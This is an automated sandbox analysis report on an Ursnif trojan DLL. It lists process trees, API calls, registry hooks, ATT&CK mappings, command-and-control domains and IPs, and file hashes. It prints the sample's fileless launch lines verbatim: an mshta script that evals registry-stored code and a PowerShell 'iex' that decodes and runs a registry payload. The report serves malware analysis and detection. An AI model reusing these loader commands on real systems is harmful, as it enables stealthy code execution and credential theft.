              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6DD41EC7 NtMapViewOfSection
              Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6DD41B9C GetProcAddress,NtCreateSection,memset
              Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6DD42485 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04612D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04618005 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04812D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04818005 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04198005 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04192D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_052F2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_052F8005 NtQueryVirtualMemory
              Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6DD8E9F0 appears 35 times
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 3a94.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: classification engineClassification label: mal100.troj.evad.winDLL@24/16@7/1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0461513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,3_2_0461513E
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.dat
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3FF9B029E5192D75.TMP
              Source: 3a94.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 3a94.dllReversingLabs: Detection: 68%
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 3a94.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 3a94.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
              Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

              Data Obfuscation:

              Suspicious powershell command line found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress,0_2_6DD41F7C
              Source: 3a94.dllStatic PE information: real checksum: 0xa34b8 should be: 0xa177e
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD42253 push ecx; ret 0_2_6DD42263
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD42200 push ecx; ret 0_2_6DD42209
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDC7583 push ecx; ret 0_2_6DDC7596
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04617A60 push ecx; ret 3_2_04617A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04617DCF push ecx; ret 3_2_04617DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04817A60 push ecx; ret 4_2_04817A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04817DCF push ecx; ret 4_2_04817DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04197A60 push ecx; ret 5_2_04197A69
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04197DCF push ecx; ret 5_2_04197DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F7DCF push ecx; ret 6_2_052F7DDF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_052F7A60 push ecx; ret 6_2_052F7A69

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara matchFile source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
              Hooks registry keys query functions (used to hide registry keys)
              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
              Modifies the export address table of user mode modules (user mode EAT hooks)
              Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
              Modifies the import address table of user mode modules (user mode IAT hooks)
              Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
              Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2786
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8E78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DD8E78D
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD41F7C LoadLibraryA,GetProcAddress,0_2_6DD41F7C
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA2120 mov eax, dword ptr fs:[00000030h]0_2_6DDA2120
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDB227F mov eax, dword ptr fs:[00000030h]0_2_6DDB227F
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE801 mov eax, dword ptr fs:[00000030h]0_2_6DDCE801
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE337 push dword ptr fs:[00000030h]0_2_6DDCE337
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDCE730 mov eax, dword ptr fs:[00000030h]0_2_6DDCE730
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8DFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6DD8DFF3
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DDA18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6DDA18EF
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: loaddll32.exe, 00000000.00000002.489789091.0000000001650000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.490512376.00000000030F0000.00000002.00000001.sdmp, powershell.exe, 0000001D.00000002.491550608.000001F1AE0D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DD8EBB6 cpuid 0_2_6DD8EBB6
              Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6DD41E8A
              Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6DD41144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6DD41144
              Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04614454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04614454
              Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6DDB1C7E _free,GetTimeZoneInformation,_free,0_2_6DDB1C7E
              Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6DD41F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6DD41F10
              Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected Ursnif
              Source: Yara match; File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

              Remote Access Functionality:

              Yara detected Ursnif (same Yara match sources as listed under Stealing of Sensitive Information above)

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 12 | Deobfuscate/Decode Files or Information 1 | Credential API Hooking 3 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
              Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Obfuscated Files or Information 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Rootkit 4 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Credential API Hooking 3 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | System Information Discovery 45 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 21 | LSA Secrets | Security Software Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 12 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

              Behavior Graph

              [Behavior graph image not reproduced. Behavior Graph ID: 444316; Sample: 3a94.dll; Start date: 05/07/2021; Architecture: WINDOWS; Score: 100. Top-level processes: iexplore.exe, loaddll32.exe, mshta.exe. The iexplore.exe child processes contact gtr.antoinfer.com and todo.faroin.at (165.232.183.49, ports 49717, 49718, 49719, ALLEGHENYHEALTHNETWORKUS, United States). loaddll32.exe starts rundll32.exe ("Writes registry values via WMI"), cmd.exe (which starts rundll32.exe) and 2 other processes. mshta.exe ("Suspicious powershell command line found") starts powershell.exe, which starts conhost.exe. Signatures shown at the top level: "Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)", "Found malware configuration", "Multi AV Scanner detection for submitted file", and 8 other signatures. DNS/IP nodes at the top level: todo.faroin.at, resolver1.opendns.com.]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              3a94.dll | 6% | Metadefender |
              3a94.dll | 69% | ReversingLabs | Win32.Trojan.Midie

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              5.2.rundll32.exe.4190000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
              0.2.loaddll32.exe.1030000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
              6.2.rundll32.exe.52f0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
              4.2.rundll32.exe.4810000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
              3.2.rundll32.exe.4610000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              gtr.antoinfer.com | 165.232.183.49 | true | true | | unknown
              resolver1.opendns.com | 208.67.222.222 | true | false | | high
              todo.faroin.at | 165.232.183.49 | true | true | | unknown

                    Contacted URLs


                    URLs from Memory and Binaries


                              Contacted IPs

                              Public

                              IP | Domain | Country | ASN | ASN Name | Malicious
                              165.232.183.49 | gtr.antoinfer.com | United States | 22255 | ALLEGHENYHEALTHNETWORKUS | true

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:444316
                              Start date:05.07.2021
                              Start time:16:50:20
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 50s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:3a94.dll
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:31
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@24/16@7/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 44.7% (good quality ratio 42%)
                              • Quality average: 78.3%
                              • Quality standard deviation: 30.2%
                              HCA Information:
                              • Successful, ratio: 81%
                              • Number of executed functions: 90
                              • Number of non-executed functions: 169
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .dll
                              Warnings:
                              • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 131.253.33.200, 13.107.22.200, 20.50.102.62, 93.184.220.29, 23.211.6.115, 104.43.193.48, 23.211.4.86, 13.107.42.23, 13.107.5.88, 23.203.80.193, 80.67.82.235, 80.67.82.211, 152.199.19.161, 20.49.157.6, 40.112.88.60
                              • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, l-0014.l-msedge.net, cs9.wpc.v0cdn.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/444316/sample/3a94.dll

                              Simulations

                              Behavior and APIs

                              Time | Type | Description
                              16:52:17 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
                              16:53:08 | API Interceptor | 18x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{166D0566-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):72360
                              Entropy (8bit):2.100864962810027
                              Encrypted:false
                              SSDEEP:192:rFZOZ92JLW/tAflxM6+HKkMN9VfOqhGfiWGzMGWiGrpGeG7xzt:rLa0Jiluo6+AN9tSHmm1m
                              MD5:317F0A36C770F6DE16BF5981B51C5D15
                              SHA1:BF0CE97F5B36315AE8B4D734A42DBD339F96CCA8
                              SHA-256:2D7D550080AD16AF04A5CC5BF68B729F9730371174C7E84FEF8A00F54DF0A695
                              SHA-512:7FFC3FFD628BA208B161BC72F71290971E8E0BAEAC72AAAEB8331773836435BE584C94A8EF4362B5BD6770354E4754D6A3815C88BD4234F455D064EC9F406144
                              Malicious:false
                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat
                              Process:C:\Program Files\internet explorer\iexplore.exe
                              File Type:Microsoft Word Document
                              Category:dropped
                              Size (bytes):28120
                              Entropy (8bit):1.9095750288955466
                              Encrypted:false
